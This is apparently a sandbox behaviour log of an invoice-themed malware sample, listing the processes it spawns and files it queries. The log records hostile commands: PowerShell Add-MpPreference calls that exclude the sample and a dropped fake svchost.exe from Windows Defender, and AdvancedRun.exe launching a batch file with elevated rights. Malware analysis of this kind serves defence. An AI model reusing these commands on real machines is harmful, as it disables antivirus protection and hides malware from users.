        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
